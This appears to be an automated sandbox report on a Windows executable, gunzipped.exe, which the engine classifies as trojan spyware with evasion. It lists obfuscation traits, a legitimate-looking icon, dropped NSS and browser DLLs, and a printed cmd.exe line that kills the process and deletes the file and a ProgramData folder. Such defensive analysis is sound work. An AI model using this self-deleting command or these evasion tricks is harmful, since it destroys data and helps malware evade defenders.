Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_004030C7 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_004030C7
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_0040315E CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		1_2_0040315E

Detected potential crypto function

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_004045FC	0_2_004045FC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33727E	0_2_6F33727E
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309F37	0_2_6F309F37
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309320	0_2_6F309320
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33FB2D	0_2_6F33FB2D
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F307303	0_2_6F307303
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308F07	0_2_6F308F07
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308B0F	0_2_6F308B0F
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308B64	0_2_6F308B64
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30936B	0_2_6F30936B
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F307340	0_2_6F307340
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309F48	0_2_6F309F48
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A74A	0_2_6F30A74A
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308F4E	0_2_6F308F4E
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3073B3	0_2_6F3073B3
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A3A7	0_2_6F30A3A7
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308FAF	0_2_6F308FAF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3093F6	0_2_6F3093F6
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309FF8	0_2_6F309FF8
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33D3E2	0_2_6F33D3E2
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33EBC1	0_2_6F33EBC1
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308BC2	0_2_6F308BC2
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30963B	0_2_6F30963B
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308610	0_2_6F308610
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308E1C	0_2_6F308E1C
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33CE70	0_2_6F33CE70
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F335A60	0_2_6F335A60
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308E69	0_2_6F308E69
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F303F55	0_2_6F303F55
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308A51	0_2_6F308A51
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3072A7	0_2_6F3072A7
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F319040	0_2_6F319040
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A2AE	0_2_6F30A2AE
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309E96	0_2_6F309E96
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309EE9	0_2_6F309EE9
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3092D0	0_2_6F3092D0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A134	0_2_6F30A134
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309937	0_2_6F309937
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308D3A	0_2_6F308D3A
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309522	0_2_6F309522
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F307529	0_2_6F307529
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F304758	0_2_6F304758
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309D17	0_2_6F309D17
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308505	0_2_6F308505
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33BD05	0_2_6F33BD05
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309165	0_2_6F309165
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308D67	0_2_6F308D67
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33D954	0_2_6F33D954
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F301CD1	0_2_6F301CD1
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3085BD	0_2_6F3085BD
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309DA1	0_2_6F309DA1
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3031AC	0_2_6F3031AC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3095D4	0_2_6F3095D4
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308DD7	0_2_6F308DD7
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309DDF	0_2_6F309DDF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30B9C3	0_2_6F30B9C3
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309430	0_2_6F309430
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A038	0_2_6F30A038
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A439	0_2_6F30A439
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308817	0_2_6F308817
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A078	0_2_6F30A078
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30747A	0_2_6F30747A
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30947B	0_2_6F30947B
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309860	0_2_6F309860
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309061	0_2_6F309061
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308C5F	0_2_6F308C5F
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F319040	0_2_6F319040
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309C42	0_2_6F309C42
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3094B0	0_2_6F3094B0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A0BA	0_2_6F30A0BA
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308CA6	0_2_6F308CA6
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3098AC	0_2_6F3098AC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308881	0_2_6F308881
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A0F2	0_2_6F30A0F2
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3090F8	0_2_6F3090F8
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3094FC	0_2_6F3094FC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3090DF	0_2_6F3090DF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_004045FC	1_2_004045FC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3C90	1_2_007C3C90
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3480	1_2_007C3480
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3060	1_2_007C3060
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3AA0	1_2_007C3AA0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B4B10	1_2_007B4B10

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: String function: 007B8C20 appears 41 times
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: String function: 004029E8 appears 47 times
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: String function: 007D2F70 appears 391 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_0019F1B7 NtQueryInformationProcess,

0_2_0019F1B7

Sample file is different than original file name gathered from version info

Source: gunzipped.exe, 00000000.00000003.306104413.0000000002E06000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000003.310975930.0000000002F9F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.319062332.0000000003341000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll8 vs gunzipped.exe

PE file contains more sections than normal

Source: sqlite3.dll.1.dr

Static PE information: Number of sections : 19 > 10

Source: gunzipped.exe

ReversingLabs: Detection: 53%

Source: C:\Users\user\Desktop\gunzipped.exe

File read: C:\Users\user\Desktop\gunzipped.exe

Jump to behavior

Source: gunzipped.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\gunzipped.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe

Source: C:\Users\user\Desktop\gunzipped.exe

File created: C:\Users\user\AppData\Local\Temp\nsy255E.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/15@0/1

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,

0_2_00402012

Source: C:\Users\user\Desktop\gunzipped.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_004040FF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004040FF

Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4140:120:WilError_01

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source:	Binary string: wntdll.pdbUGP source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
Source:	Binary string: msvcp140.i386.pdb source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F301B0F push ss; iretd	0_2_6F301B1C
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30B920 push edx; ret	0_2_6F30B921
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30B98E push ecx; retf 0000h	0_2_6F30B98F
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3380F5 push ecx; ret	0_2_6F338108
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B8C65 push ecx; ret	1_2_007B8C78

PE file contains sections with non-standard names

Source: sqlite3.dll.1.dr	Static PE information: section name: /4
Source: sqlite3.dll.1.dr	Static PE information: section name: /19
Source: sqlite3.dll.1.dr	Static PE information: section name: /35
Source: sqlite3.dll.1.dr	Static PE information: section name: /51
Source: sqlite3.dll.1.dr	Static PE information: section name: /63
Source: sqlite3.dll.1.dr	Static PE information: section name: /77
Source: sqlite3.dll.1.dr	Static PE information: section name: /89
Source: sqlite3.dll.1.dr	Static PE information: section name: /102
Source: sqlite3.dll.1.dr	Static PE information: section name: /113
Source: sqlite3.dll.1.dr	Static PE information: section name: /124
Source: mozglue.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00405C2D GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405C2D

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\Users\user\AppData\Local\Temp\nsy255F.tmp\qhvek.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon (68).png

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\gunzipped.exe

0_2_6F33727E

Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
